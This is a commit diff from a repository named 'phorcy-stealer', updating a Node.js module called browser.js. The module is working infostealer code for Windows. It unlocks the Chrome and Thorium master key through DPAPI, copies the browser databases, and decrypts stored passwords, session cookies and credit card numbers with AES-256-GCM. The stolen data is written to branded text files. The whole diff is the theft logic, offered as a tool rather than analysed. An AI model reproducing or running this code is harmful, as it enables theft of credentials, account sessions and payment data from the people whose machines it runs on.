whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update browser.js

Browse Source
This commit is contained in:
gumbobr0t
2023-11-20 20:52:46 +01:00
committed by GitHub
parent b34853e802
commit dcd41428c7
1 changed files with 302 additions and 148 deletions
Download Patch File Download Diff File Expand all files Collapse all files

360
Utils/browser.js
View File

@@ -1,23 +1,35 @@
const os = require('os');
const fs = require('fs');
const sqlite3 = require('sqlite3').verbose();
const dpapi = require('./node-dpapi');
const crypto = require('crypto')
const path = require('path')
const dpapi = require('./node-dpapi');
class BrowserStealing {
constructor() {
this.phorcyDir = path.join(os.homedir(), 'AppData', 'Roaming', 'Phorcy')
this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')]
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5']
this.password_command = 'SELECT action_url, username_value, password_value FROM logins';
//this.cookie_command = 'SELECT * FROM cookies';
this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`;
this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`;
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt')
this.local = process.env.LOCALAPPDATA
this.phorcyDir = path.join(this.local, 'Phorcy');
this.browserPaths = [path.join(this.local, 'Google', 'Chrome', 'User Data'), path.join(this.local, 'Thorium', 'User Data')];
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'];
this.tempDir = path.join(this.local, 'Temp');
//this.cookie_count = 0
this.password_count = 0
this.password_command = 'SELECT action_url, username_value, password_value FROM logins';
this.cookie_command = 'SELECT host_key, name, encrypted_value, expires_utc FROM cookies';
this.cc_command = 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards';
//this.history_command = 'SELECT url, title, last_visit_time FROM urls';
//this.downloads_command = 'SELECT tab_url, target_path FROM downloads';
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt');
this.cookieFile = path.join(this.phorcyDir, 'browser_cookies.txt');
this.ccFile = path.join(this.phorcyDir, 'browser_creditcards.txt');
//this.historyFile = path.join(this.phorcyDir, 'browser_history.txt');
//this.downloadsFile = path.join(this.phorcyDir, 'browser_downloads.txt');
this.password_count = 0;
this.cookie_count = 0;
this.cc_count = 0;
//this.history_count = 0;
//this.downloads_count = 0;
}
generateRandomString() {
@@ -25,149 +37,291 @@ class BrowserStealing {
return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`;
}
async getPasswords() {
fs.mkdir(this.tempDirCreated, (error) => {
if (error) {
console.error('Error creating temp directory:', error);
return;
fileExists(filePath) {
try {
fs.accessSync(filePath, fs.constants.F_OK);
return true;
} catch (err) {
return false;
}
}
console.log('Temp Directory created successfully.');
for (const browserPath of this.browserPaths) {
console.log(browserPath);
const local_state = path.join(browserPath, 'Local State');
console.log(local_state);
fs.readFile(local_state, 'utf8', (err, data) => {
getKey(local_stateFile, callback) {
fs.readFile(local_stateFile, 'utf8', (err, data) => {
if (err) {
console.error('Error reading local state file:', err);
console.error(err);
return;
}
const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5);
const encryptedKey = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5);
const decrypted = dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser");
const decryptedKey = dpapi.unprotectData(encryptedKey, null, "CurrentUser");
console.log('Decryption Key:', decrypted);
console.log('Decryption Key:', decryptedKey);
for (const profile of this.browserProfiles) {
const password_file = path.join(browserPath, profile, 'Login Data')
console.log(password_file)
const decryption_file = path.join(this.tempDirCreated, this.generateRandomString())
console.log(decryption_file)
fs.copyFile(password_file, decryption_file, (error) => {
if (error) {
console.error('Error copying login data file:', error);
return;
//return decryptedKey;
callback(null, decryptedKey);
});
}
console.log('Login data file copied successfully.');
const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => {
getPassword(loginFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(loginFile, tempFile, (err) => {
if (err) {
console.error('Error opening login database:', err);
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.password_command, (err, rows) => {
if (err) {
console.error('Error executing login SQLite command:', err);
console.error(err);
} else {
const formattedRows = rows.map(row => {
rows.map(row => {
if (row && row['password_value']) {
let password_value = row['password_value'];
let start = password_value.slice(3, 15),
middle = password_value.slice(15, password_value.length - 16),
end = password_value.slice(password_value.length - 16, password_value.length),
decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start);
decipher = crypto.createDecipheriv('aes-256-gcm', masterKey, start);
decipher.setAuthTag(end);
this.password_count++;
try {
const formattedContent = `+------------------------+\n| URL: ${row.action_url ? row.action_url.toString() : ''} |\n| Username: ${row.username_value ? row.username_value.toString() : ''} |\n| Password: ${decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString()} |\n`;
fs.writeFileSync(this.passwordFile, formattedContent, { flag: 'a' });
console.log(`Password written to file successfully.`);
const passwordList = `+------------------------+\n| URL: ${row.action_url ? row.action_url.toString() : ''} |\n| Username: ${row.username_value ? row.username_value.toString() : ''} |\n| Password: ${decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString()} |\n`;
fs.writeFileSync(this.passwordFile, passwordList, { flag: 'a' });
} catch (err) {
console.error('Error writing password to file:', err);
console.error(err);
}
//return {
// action_url: row.action_url ? row.action_url.toString() : '',
// username_value: row.username_value ? row.username_value.toString() : '',
// password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(),
//};
} else {
return {
action_url: '',
username_value: '',
password_value: '',
};
}
});
console.log('Password list:', formattedRows);
console.log('Password count:', this.password_count);
}
db.close((err) => {
if (err) {
console.error('Error closing login database:', err);
console.error(err);
}
});
console.log('Password count:', this.password_count)
});
});
});
fs.unlink(decryption_file, (error) => {
if (error) {
console.error('Error deleting decryption password file:', error);
} else {
console.log('Decryption password File deleted successfully.');
}
});
}
});
}
});
}
cleanUp() {
fs.rm(this.tempDirCreated, { recursive: true }, (error) => {
if (error) {
console.error('Error deleting temp directory:', error);
} else {
console.log('Temp Directory deleted successfully.');
}
});
fs.rm(this.phorcyDir, { recursive: true }, (error) => {
if (error) {
console.error('Error deleting Phorcy directory:', error);
} else {
console.log('Phorcy Directory deleted successfully.');
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
getCookie(cookieFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(cookieFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cookie_command, (err, rows) => {
if (err) {
console.error(err);
} else {
let decrypted;
rows.map(row => {
if (row && row['encrypted_value']) {
let cookie_value = row['encrypted_value'];
let first = cookie_value.slice(3, 15),
middle = cookie_value.slice(
15,
cookie_value.length - 16
),
end = cookie_value.slice(cookie_value.length-16,cookie_value.length),decipher=crypto.createDecipheriv("aes-256-gcm",masterKey,first);
decipher.setAuthTag(end),decrypted=decipher.update(middle,"base64","utf-8")+decipher.final("utf-8");
this.cookie_count++;
async prepare() {
try {
fs.mkdirSync(this.phorcyDir);
console.log('Phorcy Directory created successfully.');
const cookieList = `+------------------------+\n| Host: ${row["host_key"]} |\n| Name: ${row.name ? row.name.toString() : ''} |\n| Cookie value: ${decrypted} |\n| Expiration: ${row['expires_utc']} |\n`;
fs.writeFileSync(this.cookieFile, cookieList, { flag: 'a' });
} catch (err) {
console.error('Error creating Phorcy directory:', err.message)
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Cookie count:', this.cookie_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
getCreditCard(ccFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(ccFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cc_command, (err, rows) => {
if (err) {
console.error(err);
} else {
let decrypted;
rows.map(row => {
if (row && row['card_number_encrypted']) {
let cc_value = row['card_number_encrypted'];
let first = cc_value.slice(3, 15),
middle = cc_value.slice(
15,
cc_value.length - 16
),
end = cc_value.slice(cc_value.length-16,cc_value.length),decipher=crypto.createDecipheriv("aes-256-gcm",masterKey,first);
decipher.setAuthTag(end),decrypted=decipher.update(middle,"base64","utf-8")+decipher.final("utf-8");
this.cc_count++;
try {
const ccList = `+------------------------+\n| Name: ${row['name_on_card']} |\n| Credit Card Number: ${decrypted} |\n| Expiration: ${row['expiration_month']}/${row['expiration_year']} |\n`;
fs.writeFileSync(this.ccFile, ccList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Credit Card count:', this.cc_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async Main() {
await this.prepare();
await this.getPasswords();
setTimeout(function() {
console.log("Browser stealing complete. Cleaning.");
this.cleanUp();
}.bind(this), 4000);
// password grabber
fs.writeFileSync(this.passwordFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const passwordFile = path.join(browserPath, profile, 'Login Data');
if (this.fileExists(passwordFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getPassword(passwordFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
const browserStealer = new BrowserStealing();
browserStealer.Main();
// cookie grabber
fs.writeFileSync(this.cookieFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const cookieFile = path.join(browserPath, profile, 'Network', 'Cookies');
if (this.fileExists(cookieFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getCookie(cookieFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
// cc grabber
fs.writeFileSync(this.ccFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const ccFile = path.join(browserPath, profile, 'Web Data');
if (this.fileExists(ccFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getCreditCard(ccFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
}
}
const browserStealer = new BrowserStealing()
browserStealer.Main()
console.log('Hello, World!')